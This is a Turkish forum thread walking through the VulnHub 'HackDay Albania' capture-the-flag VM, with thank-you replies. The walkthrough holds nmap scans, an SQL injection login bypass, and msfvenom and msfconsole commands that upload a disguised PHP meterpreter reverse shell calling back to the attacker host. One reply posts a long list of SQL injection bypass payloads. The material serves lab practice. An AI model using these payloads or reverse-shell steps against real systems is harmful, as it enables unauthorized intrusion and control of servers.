İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Pentest Challange: Albian

23-07-2017 21:24
#1
Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
239
Teşekkür (Etti):
55
Teşekkür (Aldı):
199
Konular:
34
Ticaret:
(0) %

Arkadaşlar merhaba

Uzun bir zaman boyunca konu olarak CTF challange paylaşmadım.
Bugünde bunun anısına herhangi bir şey yapmıcam sadece Albania adındaki CTF challangeın çözümünü anlatacağım.


Dosyamızı şuradan rahatlıkla indirebilirsiniz.
https://download.vulnhub.com/hackday...ay-Albania.ova
Eğer indiremezseniz buradan asıl kısıma ulaşabilirsiniz.
https://www.vulnhub.com/entry/hackday-albania,167/

Önceden genel olarak 32 bit challangelar çözmekteydim.
Yeni bir bilgisayar alınca artık 64 bit challangelarda çözülebilir bir şekilde anlatıma devam edeceğim.


Ozaman başlayalım

İlk komutumuz bağlı olduğumuz ağın gatewayini öğrenmek için giriyoruz
route



Evet ip adresinin temelini 192.168.56.0 olarak alacağız.
Tüm subneti taramamız için 24 subnetini kullanacağız.
nmap -sP 192.168.56.0/24



Taramamızın sonucu olarak bize iki adet ip adresi çıkartmakta, biz 192.168.56.101 adresine saldıracağız.

Böyle bir karmaşanın olmasının nedeni önceden ağ yapısını köprü-bağdaştırıcısı ile kullanırken artık sadece-ana-makina ayarını kullanmamdan kaynaklı.
Böylece kendi gizliliğim daha ön planda olup, yapılan işlemler daha zararsız olabilmekte.

Hedef cihaza bir port taraması yapacağız, bunun için
nmap 192.168.56.101



Bize ssh(22) ve http(8008) portunun açık olduğunu söylüyor.
Tabiki http portuna bağlanmak için bir koşu tarayıcımı açıyorum.

Şunuda belirtmekte fayda var, normal bir şekilde ip adresini girerseniz default olarak 80 portunu varsayarak 80 portuna erişim isteyecektir. Bunun önüne geçmek için :8008 göstergesinide ekleyip doğru sonuca varacağız.



İlk olarak karşımıza hangi dilde olduğunu bilmediğim bir yazı ile karşılıyor ve hiç önemsemeden kapatıp bu ss'i çekiyorum.

Bir MR.Robot hayranı herhalde

İlk olarak dirb ile bir tarama yapıyorum ama yararımıza olacak bir veri çıkarmadığından devam ediyorum.
Sonra googlede gösterilmesi istenmeyen dizinlerin bulunduğu robot.txt dosyasına bakıyorum.




Anlaşılan bizi uğraştırmak istiyorlar, ve bende hamallık yapıp hepsini teker teker deniyorum.
Ve tek bir tanesi hariç hepsinde aynı sonucu alıyorum.



Burada vulnbank buradamı diye bir soru yöneltiyor.
(Gariptirki az önce garip bir dilde konuşan CTFimiz ingilizceyi sökmüş)
İlk olarak vulnbank urlsini ip adresini yanına yazdığımda sonuç alamazken, sadece son kısıma eklemenin yeterli olucağını anladım.
Ve güzel bir görüntü.



Karşımızda login paneli var, ve bir açık kaynayan bir sistemde olduğumdan ilk bypass deniyorum.(OR 1=1 -- -)
Başarılı bir şekilde bize istenilen sonucu veriyor.



Evet bunun gibi bir hata aldığınızda size bir meslek sırrı olan disable işlemini anlatmak istiyorum.
\ girerek mysql veritabanında kısadevre yapabilirsiniz.
Ve şifre kısmınada bypassımı yerleştiriyorum.



Girdiğimiz gibi karşımıza bir upload kısmı geliyor.
(Şimdi ilk halini göstermek isterdim ama ben bu CTFleri çözdükten sonra sizlere gösteriyorum ve elimde temiz bir çıktı olmadığından devam edebiliriz.)

Upload sistemine ilk olarak c99 shellini koymayı denedim
(Emin olun benimde bunu neden yaptığım hakkında bir fikrim yok).

Ama phpleri kabul etmesede açılmayacak şekilde anamenüye koyuyordu.
Ozamanda shellimizin uzantısını jpg ile değiştirelim.
Ve yine olmadı


Peki yükleyeceğimiz php dosyası illa bir shell olmak zorundamı, tabikide değil ozaman msfvenomdan php RAT oluşturuyorum.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 R > /home/belvando/at.jpg



RATımızı oluşturduktan sonra direk olarak yeniden upload ediyoruz.
Tabiki açmadan önce bir handler çalıştırmamız gerekmekte.
msfconsole -x "use multi/handler; set payload php/meterpreter/reverse_tcp; set lhost 192.168.56.1; exploit"

Hazırladığımız RATı upload ediyoruz.



Handlerımız çalışmakta iken bende karşı tarafa upload ettiğim RATımı açıyorum ve hemen bağlantı handlera düşüyor.



Evet bu seferkine kolay bir şekilde sızdık.

Eğer bunun gibi challangeların paylaşımını istiyorsanız teşekkür etmeyi unutmayın.
Elimde bir sürü challange var.
Eğer bir hatam olursa afola.
Birseferki konuda görüşmek dileğiyle.


HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.
Kullanıcı İmzası
Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando

23-07-2017 21:37
#2
Red Screen - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Hanuatu
Mesajlar:
771
Teşekkür (Etti):
111
Teşekkür (Aldı):
114
Konular:
47
Ticaret:
(0) %
Eline emeğine sağlık
Kullanıcı İmzası
^^ Çakalların çığlık sesi , Kurt uluyana kadar duyulur. ^^

... S4LDIRI T1M ...
23-07-2017 21:44
#3
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Elinize sağlık.
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
23-07-2017 21:47
#4
X - ait Kullanıcı Resmi (Avatar)
X
Administrator
Üyelik tarihi:
04/2013
Mesajlar:
38.730
Teşekkür (Etti):
0
Teşekkür (Aldı):
3744
Konular:
445
Ticaret:
(0) %
eline sağlık güzel çalışma olmuş
Konu Fearlessleon tarafından (27-07-2017 14:09 Saat 14:09 ) değiştirilmiştir.
KurokoTetsuya Teşekkür etti.
23-07-2017 23:07
#5
Üyelik tarihi:
06/2017
Mesajlar:
140
Teşekkür (Etti):
55
Teşekkür (Aldı):
14
Konular:
12
Ticaret:
(0) %
Eline emeğine sağlık
23-07-2017 23:16
#6
Üyelik tarihi:
04/2015
Nereden:
SGA
Yaş:
20
Mesajlar:
5.048
Teşekkür (Etti):
2327
Teşekkür (Aldı):
1549
Konular:
281
Ticaret:
(0) %
Böyle konuları okumak yerine BruteForce'u tercih ediyorsanız kendinize "Ben hack yolunda ilerliyorum" diyemezsiniz.

Elinize sağlık, dün mesaj atacaktım daha konularınızı göremiyorum diye.
Kullanıcı İmzası
"Saian kurşun geçirmez Cadillac gibi"
23-07-2017 23:37
#7
akrandd - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2013
Mesajlar:
183
Teşekkür (Etti):
5
Teşekkür (Aldı):
30
Konular:
15
Ticaret:
(0) %
Forumda neredeyse ilk defa, bruteforce yapıp ben hackerım diye geçinmeyen biriyle karşılaşıyoru. Bypass kodlarını konuya eklermisiniz?
24-07-2017 01:21
#8
Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
239
Teşekkür (Etti):
55
Teşekkür (Aldı):
199
Konular:
34
Ticaret:
(0) %
Alıntı:
KurokoTetsuya´isimli üyeden Alıntı Mesajı göster
Böyle konuları okumak yerine BruteForce'u tercih ediyorsanız kendinize "Ben hack yolunda ilerliyorum" diyemezsiniz.

Elinize sağlık, dün mesaj atacaktım daha konularınızı göremiyorum diye.
Evet bu aralar tatilde olduğumdan fazla ilgilenemiyorum.

Alıntı:
akrandd´isimli üyeden Alıntı Mesajı göster
Forumda neredeyse ilk defa, bruteforce yapıp ben hackerım diye geçinmeyen biriyle karşılaşıyoru. Bypass kodlarını konuya eklermisiniz?
Kod:
 ' or ''='
‘or’1’=’1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
OR 1=1 -- -
' or true--
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
'+'
'&'
'^'
'*'
' or ''-'
' or ''+'
' or ''&'
' or ''^'
' or ''*'
"-"
"+"
"&"
"^"
"*"
" or ""-"
" or ""+"
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
Kullanıcı İmzası
Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
24-07-2017 01:32
#9
_MaC_ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2009
Nereden:
Bilinmezden
Mesajlar:
1.363
Teşekkür (Etti):
136
Teşekkür (Aldı):
149
Konular:
35
Ticaret:
(0) %
Eline sağlık. Çok faydalı konu olmuş.
Kullanıcı İmzası
01:10:11:01:01:10:00:01:01:10:00:11

2009-2018
24-07-2017 03:02
#10
kenzai - ait Kullanıcı Resmi (Avatar)
Kıdemli Orgeneral
Üyelik tarihi:
12/2013
Mesajlar:
8.390
Teşekkür (Etti):
3771
Teşekkür (Aldı):
2368
Konular:
1443
Ticaret:
(0) %
eline sağlık dostum
Kullanıcı İmzası
Kolaylaştırınız, güçleştirmeyiniz, müjdeleyiniz, nefret ettirmeyiniz.
HZ.MUHAMMED MUSTAFA (S.A.V)


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı